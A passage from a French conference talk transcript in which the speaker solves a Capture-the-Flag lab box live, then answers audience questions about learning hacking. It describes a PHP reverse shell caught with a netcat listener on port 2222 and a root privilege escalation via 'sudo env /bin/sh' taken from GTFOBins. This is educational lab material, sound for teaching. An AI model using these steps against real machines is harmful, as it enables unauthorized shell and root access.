chose qui s'appelle shell.php, il n'est pas allé le mettre dans un autre répertoire. Il l'a mis à l'endroit où se trouve index.php. Donc maintenant, comme tout hôte qui sait recevoir, on se prépare à accueillir notre ami. Donc, on va ouvrir un autre terminal quelque part. Allez, juste un, j'en veux pas 50. Ok, pas celui-là. Voilà. Donc là, on va utiliser la commande nc, donc c'est netcat-nlvp, et sur le port 2222, c'est le port qu'on s'est engagé à ouvrir pour lui. Je vais mettre ça là. Je reprends mon petit Firefox. Je vais le réduire. Ok. Donc là, j'ai mon Firefox et mon Netcat juste à côté. Donc c'est mon reverse shell qui est ouvert. Je lui ai ouvert une voie et maintenant, je vais aller juste exécuter le fichier shell.php qui contient toutes les instructions pour se connecter à ma propre machine. Donc je change là tout mon truc avec view, etc. Je vais juste appeler shell.php. Et là, salut. Donc là, le site web s'est connecté au terminal. D'ailleurs, vous pouvez voir que dans mon navigateur, là, la page web, elle est en train de charger. En fait, elle charge de manière infinie parce que je ne vais jamais lui rendre la main. C'est une commande interactive. Si jamais je kill là-bas le processus, ça me dit qu'il y a une erreur. Si jamais je relance mon shell, ça se reconnecte. Si jamais j'arrête le chargement de la page, ça va, ça conserve, ça dépend. Là, visiblement, c'est OK. Donc, j'essaie de retourner encore, de voir qui je suis. Donc, who am I? 3W data. D'accord. Donc là, cette fois, on a quand même un accès un peu plus pérenne. Alors attention, c'est une ligne de commande, mais une ligne de commande fortement dégradée. Si vous êtes habitué à un petit ZSH ou quelque chose avec une belle complétion des couleurs, etc., ici, c'est non. Déjà, si vous voulez faire un clear, ça ne marche pas. Si vous voulez la complétion, vous faites ça, ça fait des tabulations. Enfin, ça fait vraiment n'importe quoi. Du coup, on rappelle quand même ce que c'est le but d'un CTF, c'est de trouver des flags. Donc là, on commence à avoir une position suffisante pour se dire on va pouvoir chercher les choses. Et notamment, comme je vous ai dit, souvent il y a un user flag, un root flag. Le user flag, il se trouve la plupart du temps dans le répertoire par défaut du user. Connecté avec le user 3W-data, on a vu que son site était dans var 3W-html. Je vais aller voir par là-bas, var 3W-html. Et je vois un fichier qui s'appelle flag.php. Il y a d'ailleurs mon beau fichier shell.php à côté. Donc, je peux aller voir ça, var 3W HTML.
Et voilà, ça c'est mon premier flag. C'est donc un mot de passe, hein, comme ça, mais que je vais pouvoir en fait copier, hop, en entier même, et que je vais aller pouvoir rentrer sur mon interface ici pour dire, ok, c'était quoi le flag 1? C'était ça. Bim, un point. Donc, ok, on a réussi à faire ça. Mais c'est pas suffisant. On est connecté avec un user qui n'a quand même peu de droits, généralement, et c'est bien normal et c'est bien rassurant. En tout cas, pas de droit d'écriture ou quoi que ce soit, et surtout pas de droit super utilisateur. Donc, là, on va faire ce qu'on appelle généralement une privilege escalation. Privilege escalation, il y en a deux. Soit ça va être une horizontale privilege escalation, soit une verticale privilege escalation. Horizontale, l'idée c'est de dire qu'il y a peut-être un autre user sur la machine. On a trouvé on a réussi à infecter le compte d'un développeur, mais peut-être qu'on va réussir avec ça à se connecter au compte d'un comptable, qui aura peut-être beaucoup plus de droits sur la machine, ou le compte d'un administrateur système, qui aura peut-être accès à des choses. Vertical privilege escalation, on va vraiment essayer d'aller en haut de la pyramide, c'est-à-dire se retrouver en route. Pour ça, il existe des outils qui permettent de scanner toute la machine à la recherche de failles. Il y a notamment un très bon outil qui s'appelle LeanPeace. Mais ici, en fait, on va se cantonner aux choses assez rapides, notamment pour une question de temps. Et on va aller regarder si, à tout hasard, notre utilisateur, il n'aurait pas des droits sudo. Donc vous savez que sur une machine Linux, il peut y avoir d'installer ce qu'on appelle l'utilitaire sudo, qui veut dire super user do. On va demander au super utilisateur de faire une action à notre place. Pour ça, il faut qu'il nous l'ait autorisé avant. Et il y a la commande sudo-l qui va nous permettre de savoir quelles sont les commandes que l'on a le droit d'exécuter en tant que super utilisateur. Et ici, on me dit que en tant que super utilisateur, j'ai le droit, en tant que root, enfin avec les droits de root, sans entrer de mot de passe, d'utiliser la commande env. La commande env, je ne sais même pas ce qu'elle fait. Et honnêtement, ça ne m'intéresse pas. Le seul truc qui va m'intéresser, c'est de me dire, ok, j'ai un nom de commande que je peux utiliser en super utilisateur. Je vais sur un site magique qui s'appelle GTFOBeans, qui répertorie toutes les façons détournées d'utiliser un utilitaire Linux, Unix, Linux. Si vous avez suivi la conf sur la cybersécurité hier, on vous parlait de détournement, par exemple pour les meubles Ikea, etc. C'est la même chose. Ici, j'ai donc mon site, je vais lui dire que moi je cherche env. Il me dit que env, il a trois façons de le détourner, soit en mode shell, soit en mode SUID, soit en mode sudo. Moi c'est mode sudo, ok. Et on me dit que j'ai le droit de faire sudo env, et que comme argument à env, je peux lui donner /bin/sh. Donc /bin/sh, c'est un shell, c'est une ligne de commande, et c'est une ligne de commande qui va être lancée par env. Et env, je l'aurai utilisé avec sudo. Donc ça va faire sudo env, env va être lancé avec les droits super utilisateur, et il va demander à faire un nouveau processus, un processus enfant, qui va se créer avec les mêmes droits, qui va être /bin/sh. Donc un shell en route. On essaye ça. Si je retrouve un terminal. Voilà. Donc on a dit que je faisais sudo env /bin/sh. Pas de réponse. Ça souvent, c'est plutôt bon signe en fait. C'est que du coup, encore une fois, vous êtes sur un terminal qui est extrêmement dégradé et en fait, il n'y a pas du tout toutes les décorations autour de votre utilisateur, etc. Voilà. En fait, ici, ça marche. Si je fais ls, je suis encore connecté. Mais du coup, si j'essaye, où am I? Root. ID, root. Donc là, on est connecté en super utilisateur sur la machine. On peut faire ce qu'on veut dessus, en théorie. Du coup, on va aller chercher le flag de root. Donc a priori, il doit se trouver dans le répertoire utilisateur de /root, enfin de root, donc qui est /root. Il y a un fichier qui s'appelle flag3. Et on a ici accès au deuxième mot de passe. Donc comme vous voyez, c'est même le troisième. C'est-à-dire qu'en fait, il y en a un autre quelque part qui est caché. Et petit spoiler, sur cette machine, il y en a même un quatrième qui est caché. C'est-à-dire que là, vous êtes root, et pourtant, vous allez être incapable de trouver le quatrième, qui se trouve encore dans un niveau de profondeur un peu plus loin. On aura l'occasion d'en parler si vous voulez après ça. Il reste 5 minutes si vous avez des questions à poser, si vous avez des remarques, des choses. C'est aller un peu vite. Je vous donne quand même, c'est vrai que quelques ressources utiles, à savoir donc le site de l'OWASP, donc l'Open Worldwide Application Security Project, qui a beaucoup de ressources utiles, mais notamment
des applications qui sont vraiment faillibles pour aller tester. Par exemple, tester une injection SQL, on vous dit il y a 4 niveaux de difficulté, et vous allez tester. Au début, l'injection SQL, elle marche à tous les coups, puis après, ils ont trouvé une petite parade, puis ils arrivent encore à bypasser, etc. Ça vous donne beaucoup de clés sur les bonnes pratiques de sécurisation ou les mauvaises pratiques aussi. Des fois, on a des bonnes idées et pas du tout. Un des trucs qu'on entend souvent, c'est qu'est-ce que je fais pour éviter le brute force? Bah, si quelqu'un essaie de se connecter 10 fois avec un nom d'utilisateur, je banne cet utilisateur pendant 1 heure. Cool. C'était peut-être pas lui en fait. Quelqu'un a essayé de voler son mot de passe et vous allez bannir un utilisateur. C'est pas l'utilisateur que vous devez bannir, c'est l'adresse IP par exemple qui va émettre ça. Donc voilà, des fois on peut avoir des bonnes idées qui ne sont en fait pas vraiment bonnes. Il y a les walkthroughs et les write-up. Donc quand vous êtes sur une box, vous avez accès à des gens qui l'ont déjà résolu et qui ont fait une petite documentation sur comment ils l'ont résolu. Et c'est hyper intéressant parce que des fois vous êtes persuadé d'être à 2 doigts de la fin et en fait impossible. Donc c'est vraiment très très sympa. Et d'ailleurs, vous pouvez, typiquement sur cette box, vous avez vu quand on a fait du log poisoning, si j'avais juste écrit, par exemple, quand j'ai fait mon système de Wuamai, si j'avais fait système entre parenthèses double quote Wuamai, la box était plantée. Puisque du coup, à d'autres endroits, il y a déjà des 2 points. Ça aurait fait un code qui, de toute façon, sera toujours planté. Il sera toujours dans les logs. J'aurais beau faire ce que je veux, il sera dans les logs et ça va planter l'affichage de la page. Donc des fois, ça peut être très frustrant de se dire, mais mince, je suis presque sûr que j'ai trouvé, et ça peut vraiment se jouer à ça. Et enfin, il existe des meet-up, donc notamment Hack the Box qui organise des meet-up sur Discord. Il y a même des représentants qui sont dans le coin. Donc n'hésitez pas si vous voulez participer, c'est aussi très très enrichissant. Donc si vous avez des questions, c'est maintenant, et dans tous les cas, je vous remercie beaucoup pour votre écoute. C'était ma première conférence, donc n'hésitez pas à me laisser d'un petit feedback avec le QR code ou à venir m'en parler directement aussi. Je sais que c'est un sujet qui est relativement technique. J'ai essayé de le simplifier au max. J'ai réécrit à peu près tout le script 3 fois en me disant « Ah, j'ai peut-être plus simple pour que ce soit plus compréhensible ». Donc n'hésitez pas. Et puis voilà, si vous avez des questions, il nous reste 3 minutes et sinon on se croise à la sortie. Oui. Alors en fait, il y a plusieurs. Donc la question, c'est pour moi, le capture the flag, il y a plusieurs personnes qui s'affrontent. Alors ça, en fait, il y a sur les plateformes, il y a des événements où en fait, c'est par exemple ceux qui vont arriver le plus vite possible à ce qu'on appelle gravir la montagne et faire des box, mais en plus de plus en plus importantes, mais en plus potentiellement de réussir à bloquer les failles qui étaient présentes avant. Donc là, il y a plus une notion de compétition, mais sinon, il faut plutôt le voir comme vraiment quelque chose. Dans ce cas, dis-toi que c'est plutôt où est Charlie, si tu préfères. Mais voilà, ça s'appelle historiquement Capture the Flag. Oui. Non, mais alors, oui et non. T'as remarqué que j'ai 2 PC? Non, pas vraiment, mais je pourrais publier ça sans souci. Je mettrai ça sur Twitter, je pense. Mais oui, en effet, ici, j'ai une doc entière sur tout ce que je fais pour être sûr juste de pas me louper. Et sinon, en tout cas, directement, si tu vas voir la box, donc qui s'appelle Doc4 sur la plateforme, il y a plein de gens qui l'ont résolu et qui, du coup, t'expliquent comment ils ont fait. Ce qui est très chouette, c'est qu'il y a souvent des gens qui expliquent bon, bah, j'ai fait ça. Et là, c'est exactement comme quand tu es sur Stack Overflow. Tu dis, mais moi aussi, j'ai fait ça. Et là, il te dit, et j'ai pas réussi. Ah, on est d'accord. Voilà. Et du coup, il t'explique après comment il est passé à la suite. Il y a vraiment des fois, ça se joue à un caractère ou des choses comme ça. Quand tu fais des injections SQL, par exemple, ça peut être très pénible. J'ai aussi volontairement orienté cette conf sur des outils manuels. Il existe plein d'outils qui permettent d'automatiser plein de choses, des Metasploit Framework, des Burp, etc. C'est des super outils, mais il faudrait déjà une conf de 2 heures pour apprendre à s'en servir. Et là, ça serait, si déjà ça vous a paru cryptique, ça aurait pu être pire, honnêtement. Est-ce qu'il reste des questions ? Eh bien, oui. Le hacking. Alors, où est-ce qu'on peut apprendre le hacking ? Franchement, c'est vraiment une question de patience et il y a beaucoup de connaissances à récupérer comme ça au fur et à mesure. Il y a quand même sur beaucoup de sites, mais notamment sur les sites de l'OWASP et tout ça, des références pour commencer à apprendre. Et sinon, après, ce genre de plateforme, c'est vraiment la clé. Surtout que
Si tu commences, les box sont rangées par niveau de difficulté, tu commences par les faciles, celles que les gens ont le plus souvent réussi. Si jamais tu bloques, tu vas voir les write-up. Tu assistes à du coup, à des meet-up où des gars font des résolutions devant toi. Et comme ça, au fur et à mesure, tu chopes les bons éléments. Tu te dis, OK, la bonne étape, c'est faire ça. Il y a des étapes à suivre, des outils à connaître. Et au fur et à mesure, tu les résous de plus en plus facilement, quoi. Oui. Il y a un peu de ça, ouais. De toute façon, l'énumération, ça reste un truc où tu dois commencer à connaître ta cible. Et du coup, quand tu es sur les box faciles, l'énumération, elle marche toujours, entre guillemets. Puis à un moment, tu as un premier truc, c'est si tu fais pas dans ton Nmap, si tu fais pas tirer, tu vois pas les ports au-dessus de 1000. Et du coup, tu prends une box, il n'y a aucun port qui répond. Bon. Et puis bah, tu cherches, et là tu découvres le tiré, et là tu trouves qu'il y a le port 8888 qui est ouvert, et ok, l'histoire recommence. Et ça va t'arriver sans cesse en fait, de dire bah là j'ai plus aucune solution, et tu vas découvrir une nouvelle chose. Comme la LFI, RFI, la RCE, etc. Bah, au fur et à mesure, tu apprends des façons de faire. La privilege escalation, il y a 10 façons de faire. Bah, tu en maîtrises une, puis une deuxième, puis une troisième. Et au bout d'un moment, ça te fait une masse d'outils comme ça que tu peux utiliser et qui vont faire que ça devrait de mieux en mieux se passer, quoi. Le temps est passé. Ça va être pause café et rendez-vous pour la keynote. Et merci aux organisateurs.